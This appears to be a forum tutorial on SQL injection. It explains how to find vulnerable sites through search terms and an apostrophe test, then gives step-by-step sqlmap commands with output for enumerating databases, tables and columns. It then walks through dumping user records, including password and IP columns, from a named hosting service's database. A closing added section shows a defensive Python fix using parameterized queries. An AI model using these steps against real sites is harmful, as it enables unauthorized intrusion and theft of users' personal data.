How to SQL inject a website!

Prerequisites:
SQLmap or Kali Linux
To begin you need to find a website that is vulnerable. To find one try using search terms along the lines of: php?id= , login.php?id= , index.php?id= , etc.
To test if a website is vulnerable you can add an apostrophe (') to the end of the URL.
If the website is vulnerable you will get an error that looks like this: http://www.xyz.net/inventory.php?id=173, or similar.
Now you can go to your command line and type: sqlmap -u (URL) --dbs
Now you will get a message like this:
available databases (number of databases found)
[*] database 1
[*] database 2
[*] database 3
Note: the number of databases may vary.
Now it is time to scan a database to detect tables. To do this type:
sqlmap -u (URL) -D (choose a database) --tables
Now you will get a message like this:
Database: (the database you chose)
(the number of tables) tables
+-----------+
| (table 1) |
| (table 2) |
| (table 3) |
+-----------+
Now you can check a table for columns. To do this type:
sqlmap -u (URL) -D (the database you chose) -T (choose a table) --columns
Now you will get a message like this:
Database: (the database you chose)
Table: (the table you chose)
[(Number of columns) columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| column | dataType |
| column | dataType |
| column | dataType |
+--------+----------+
Now you can dump the data in the column by typing:
sqlmap -u (URL) -D (the database you chose) -T (the table you chose) -C (choose a column) --dump
Now let’s penetrate an actual database using this knowledge.
In this example we will penetrate evo.net, a web hosting service, by penetrating a website linked to their host’s database to steal information about evo.net’s users.
First let’s go to http://www.xyz.net/inventory.php?id=173 and use the apostrophe test to see if it is vulnerable.
We get an SQL error. That means it is vulnerable!
Now we can open up the command line and type:
sqlmap -u http://www.xyz.net/inventory.php?id=173 --dbs
We now get this message:
available databases [8]:
[*] information_schema
[*] urbanm2_
[*] urbanm2_bbforum
[*] urbanm2_cdub
[*] urbanm2_db
[*] urbanm2_nom
[*] urbanm2_wedding
[*] urbanm2_wp
Now let’s select urbanm2_cdub. Let’s type:
sqlmap -u http://www.xyz.net/inventory.php?id=173 -D urbanm2_cdub --tables
Now we get this:
Database: urbanm2_cdub
[12 tables]
+----------------+
| evo_antispam   |
| evo_blogs      |
| evo_blogusers  |
| evo_categories |
| evo_comments   |
| evo_groups     |
| evo_hitlog     |
| evo_locales    |
| evo_postcats   |
| evo_posts      |
| evo_settings   |
| evo_users      |
+----------------+
Now we can select users by typing:
sqlmap -u http://www.xyz.net/inventory.php?id=173 -D urbanm2_cdub -T evo_users --columns
You should get this message:
Database: urbanm2_cdub
Table: evo_users
[21 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| dateYMDhour    | datetime         |
| ID             | int(10) unsigned |
| user_aim       | varchar(50)      |
| user_browser   | varchar(200)     |
| user_domain    | varchar(200)     |
| user_email     | varchar(100)     |
| user_firstname | varchar(50)      |
| user_grp_ID    | int(4)           |
| user_icq       | int(10) unsigned |
| user_idmode    | varchar(20)      |
| user_ip        | varchar(15)      |
| user_lastname  | varchar(50)      |
| user_level     | int(10) unsigned |
| user_locale    | varchar(20)      |
| user_login     | varchar(20)      |
| user_msn       | varchar(100)     |
| user_nickname  | varchar(50)      |
| user_notify    | tinyint(1)       |
| user_pass      | varchar(32)      |
| user_url       | varchar(100)     |
| user_yim       | varchar(50)      |
+----------------+------------------+
Finally you can find information, such as IP addresses, by typing:
sqlmap -u http://www.atacar.net/inventory.php?id=173 -D urbanm2_cdub -T evo_users -C user_ip --dump
To recap, we penetrated a poorly designed web application on a website to hack their host’s database, then accessed a database connected to their host’s.
We then accessed the evo_users table and the user_ip column to dump user IP addresses.
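Why the apostrophe test on a page like inventory.php?id=173 produces an SQL error, and the change that removes it, shown as an added example (not code from the original post). It uses Python and SQLite as a stand-in for the PHP page; the table contents, function names and status codes are all constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the table behind inventory.php?id=..."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE inventory (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO inventory VALUES (173, 'sample item')")
    return db

def lookup_vulnerable(db, raw_id):
    # BEFORE: the request parameter is pasted into the SQL text, so a stray
    # apostrophe becomes part of the statement and the database raises a
    # syntax error. That visible error is what the apostrophe test looks for.
    return db.execute("SELECT name FROM inventory WHERE id = " + raw_id).fetchall()

def lookup_hardened(db, raw_id):
    # AFTER, step 1: accept only what the page expects, a short ASCII integer.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        return 400, None
    try:
        # Step 2: bind the value as a parameter; it is never parsed as SQL.
        row = db.execute(
            "SELECT name FROM inventory WHERE id = ?", (int(raw_id),)
        ).fetchone()
    except sqlite3.Error:
        # Step 3: log the detail server-side, send the client a generic status.
        return 500, None
    return (200, row[0]) if row else (404, None)

def leaks_sql_error(handler, db, raw_id):
    """True if the handler lets a database error escape for this input."""
    try:
        handler(db, raw_id)
    except sqlite3.Error:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    for raw in ("173", "173'"):  # normal request, then the apostrophe test
        print(repr(raw),
              "vulnerable leaks error:", leaks_sql_error(lookup_vulnerable, db, raw),
              "| hardened:", lookup_hardened(db, raw))
```

On the database side, restricting the web application's account to its own schema limits what a single injectable page can reach; the walkthrough above lists eight databases through one page.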
